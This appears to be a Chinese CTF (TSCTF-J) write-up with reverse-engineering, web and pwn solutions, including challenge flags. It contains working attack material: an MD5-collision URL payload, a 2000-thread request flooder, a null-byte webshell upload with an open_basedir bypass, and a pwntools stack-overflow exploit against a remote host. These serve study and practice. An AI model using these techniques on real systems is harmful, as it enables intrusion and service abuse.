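decode = "abcdefghijklmnopqrstuvwxyz!!!"
# Invert the check: subtract 9, then XOR with the key character.
# Each recovered character is printed on its own line.
for i in range(0, 29):
    p = (n[i] - 9) ^ ord(decode[i])
    print(chr(p))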
# easyASM
头一次看着字节码还原py 很有成就感(x
# -*- coding: utf-8 -*-
"""
Created on Tue Oct 13 21:42:39 2020
@author: Kagami
"""
#olis=[169, 154, 191, 182, 144, 234, 159, 177, 217, 236, 138, 160, 128, 154, 166, 138, 216, 137, 190, 202, 190, 183, 171, 158, 148, 175, 137, 254, 146]
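def main():
    """Prompt for a guess and report whether it is the expected flag.

    A guess is accepted only when its encoding ``e(s)`` equals the stored
    byte string and ``b(s)`` confirms the ``TSCTF-J{...}`` framing.
    """
    s = input("Guess?\n>> ")
    o = b'\xa9\x9a\xbf\xb6\x90\xea\x9f\xb1\xd9\xec\x8a\xa0\x80\x9a\xa6\x8a\xd8\x89\xbe\xca\xbe\xb7\xab\x9e\x94\xaf\x89\xfe\x92'
    # Single combined test so that every rejected guess prints 'wrong'.
    # The source lost its indentation, so which ``if`` the ``else`` belonged
    # to cannot be recovered; with two nested ``if`` statements one of the
    # failure cases would print nothing.
    if e(s) == o and b(s):
        print('correct')
    else:
        print('wrong')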
def a(i):
    """Return the number of items in ``i`` (a thin alias for ``len``)."""
    size = len(i)
    return size
def b(i):
    """Return True only if ``i`` starts with ``TSCTF-J{`` and ends with ``}``."""
    has_prefix = i[:8] == 'TSCTF-J{'
    has_suffix = i[-1:] == '}'
    return has_prefix and has_suffix
def c(i):
    """Add 128 (mod 256) to every item of the list ``i`` and return it reversed as bytes.

    The list is modified in place before the reversed copy is built.
    """
    for idx, value in enumerate(i):
        i[idx] = (value + 128) % 256
    return bytes(reversed(i))
def e(f):
    """Encode the string ``f`` the way the checker does.

    Character i is XORed with character (i + 4) modulo the length, and the
    resulting list is passed through ``c``.
    """
    l = len(f)
    mixed = [ord(f[i]) ^ ord(f[(i + 4) % l]) for i in range(l)]
    return c(mixed)
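# Recovery script (the author's "payload").
# Target bytes as integers, identical to the byte string ``o`` in main().
# The loops below read ``olis``, which the file only contained as a comment,
# so running it as-is ended in a NameError.
olis = [169, 154, 191, 182, 144, 234, 159, 177, 217, 236, 138, 160, 128, 154,
        166, 138, 216, 137, 190, 202, 190, 183, 171, 158, 148, 175, 137, 254, 146]

# First unknown character: output index -5 depends only on f[4] and f[8].
for x in range(32, 127):
    if e('TSCTF-J{' + chr(x))[-5] == olis[-5]:
        print(chr(x))
# TSCTF-J{R3aLly_E4sy_4Ss3mblY}

# Remaining characters, one position per outer iteration. The flag has
# len(olis) characters and the first 8 are the known prefix, so exactly
# len(olis) - 8 positions are left; the previous fixed count of 22 ran one
# step past the end of the flag.
last = ''
t = -5
for p in range(len(olis) - len('TSCTF-J{')):
    for x in range(32, 127):
        if e('TSCTF-J{' + last + chr(x))[t] == olis[t]:
            last = last + chr(x)
            t = t - 1
            print(chr(x))
            # Restart the search from the first printable character for the
            # next position.
            break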
我比较蠢 直接穷举了ascii(因为ascii本来也没多少)
由于最开始的是TSCTF-J{ 末尾是} 根据w = ord(f[i])^ord(f[(i+4)%l])
第i个字符和i+4有关系 直接穷举了然后检测符合不符合原始的那一长串o = b'\xa9\x9a\xbf\xb6\x90\xea\x9f\xb1\xd9\xec\x8a\xa0\x80\x9a\xa6\x8a\xd8\x89\xbe\xca\xbe\xb7\xab\x9e\x94\xaf\x89\xfe\x92'
# WEB
# EasyF12
一道送分题,f12就行了。
确实。
上下左右点不了最后的 删掉disabled
观察到下列代码 发现检测了cookies直接修改跳过检测
修改cookies
在final1.php
构造md5相等payload
http://node.buptmerak.cn:10011/fina1.php?param1=s878926199a&param2=s155964671a&param3[]=2&param4[]=3
# ZBR想要请客
请客!!gkdgkd
没啥好说的 简单的修改cookies
观察到这些
直接修改cookies得到flag
注意:totalSolve 和totalWrong居然是反的??
TSCTF-J{R1ch_Ric1n_ZBR_D1nn3r!}
# 一起顶热评!
硬post(条件竞争也行??)
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 4 22:38:21 2020
@author: Kagami
"""
import urllib
import requests
import json
import os,re,time,random,base64
import threading
import websocket
import requests
import json
from urllib.parse import quote, unquote
from requests.cookies import RequestsCookieJar
import socket
# Default timeout of 20 seconds for sockets created after this call.
socket.setdefaulttimeout(20)
# Form body sent with every request.
# NOTE(review): 3979 is presumably the id of the comment being voted for - confirm.
data = {"subscribe":3979}
# Challenge endpoint.
u = 'http://node.buptmerak.cn:10026/'
# Running counter printed and incremented by eee().
js = 630146
# Session cookie, redacted in the write-up.
cookie = {
'cookie':"*************"
}
def aki_post(url, aki_json):
    """POST ``aki_json`` as form data to ``url`` with the module-level cookie.

    Returns the ``requests`` response object.
    """
    return requests.post(url, cookies=cookie, data=aki_json)
def eee():
    """Send one vote request and bump the global counter ``js`` on success.

    NOTE(review): the source lost its indentation; the nesting below (count
    and the '+100' marker only on a successful response) is the most
    plausible reading - confirm against the author's file. ``js`` is shared
    between threads and updated without a lock.
    """
    global js
    response = aki_post(u, data)
    if '成功帮顶' not in response.text:
        return
    print(js)
    js = js + 1
    if js % 100 == 0:
        print('+100')
def ww():
    """Worker loop: call eee() 10000 times and let any exception propagate."""
    remaining = 10000
    while remaining:
        remaining -= 1
        try:
            eee()
        except Exception as e:
            raise e
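# Start the worker threads. From the server's side, this challenge works
# because the endpoint accepts the same vote request over and over.
the_list = [threading.Thread(target=ww) for _ in range(2000)]
started = []
try:
    for things in the_list:
        things.start()
        started.append(things)
except RuntimeError:
    # Raised when the interpreter cannot start another thread. The original
    # bare ``except`` also hid unrelated errors.
    print ("Error: 无法启动线程")
# Wait for the workers that did start. The original ``while 1: pass`` kept
# one CPU core busy and never let the script exit.
for things in started:
    things.join()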
得到个ascii art 然后f12一下就能看到flag了
# 菜鸡的第一个HTML
得到av号
查看知道歌手
TSCTF-J{nanawoakari}
# EzUpload
发现应该是要用php马
且进行了简单的上传限制与检测eval关键字
上传php马 over.php.jpg
利用burpsuite 修改hex 在十六进制的php和.jpg之间加入00 使其上传后截断
使用weevely生成马并连接
发现flag 利用下面这段打印出来
<?php
// Snippet from the write-up, run through the uploaded script: it changes
// open_basedir at runtime with ini_set(), changes directory upwards and then
// reads /flag.txt.
// Defensive reading: open_basedir is being altered by script code here, so it
// should not be the only containment around uploaded files. Listing ini_set
// in disable_functions and never executing files from the upload directory
// both close this path.
ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(file_get_contents("/flag.txt"));?>
# PWN
# TooEasy
观察到
-00000070 name db 100 dup(?)
-0000000C flag dd ?
-00000008 anonymous_0 dd ?
char name[100]; // [esp+0h] [ebp-70h] [esp+0] [ebp-112]
int flag; // [esp+100] [ebp-12]
int *v6; // [esp+68h] [ebp-8h]
/* Decompiler output for main(): reads a name into a 100-byte stack buffer and
   calls fun() only if the adjacent local `flag` holds 305419896. */
int __cdecl main(int argc, const char **argv, const char **envp)
{
int result; // eax
char name[100]; // [esp+0h] [ebp-70h]
/* flag is at ebp-0Ch and name starts at ebp-70h: 0x70 - 0x0C = 100, so flag
   begins exactly where name ends and is the first local hit by an overrun. */
int flag; // [esp+64h] [ebp-Ch]
int *v6; // [esp+68h] [ebp-8h]
v6 = &argc;
flag = 1131796;
puts("please write down your name!");
/* recv here takes only the buffer; no length is visible at this call site.
   Presumably the read is not limited to 100 bytes (confirm in recv's body).
   The fix is a read bounded by sizeof(name). */
recv(name);
/* 305419896 == 0x12345678. main never assigns this value itself, so the
   branch is reachable only if flag is changed through the buffer above. */
if ( flag == 305419896 )
{
fun();
result = 1;
}
else
{
puts(name);
/* NOTE(review): flag is an int cast to a pointer and handed to puts. */
puts((const char *)flag);
result = 0;
}
return result;
}
利用输入的name溢出可以直接修改flag变量的值
从而得到flag
#payload
from pwn import *
# Connect to the challenge service.
conn = remote("node.buptmerak.cn", "10021")
# name[] is 100 bytes and the int ``flag`` follows it directly on the stack
# (ebp-70h and ebp-Ch in the listing), so 100 filler bytes reach it.
padding = b'a' * 100
# 305419896 is the constant main() compares flag against. A read bounded to
# sizeof(name) on the server side would stop this overwrite.
p = padding + p32(305419896)
conn.send(p)
conn.interactive()
#TSCTF-J{WoW!_Thi5_pR0gr4m_1s_h@cK3d}
# checkin
# 从下载开始
签到题,下下来运行就行了 得到个二维码和关键词 关注发一下TSCTF-J就得到flag了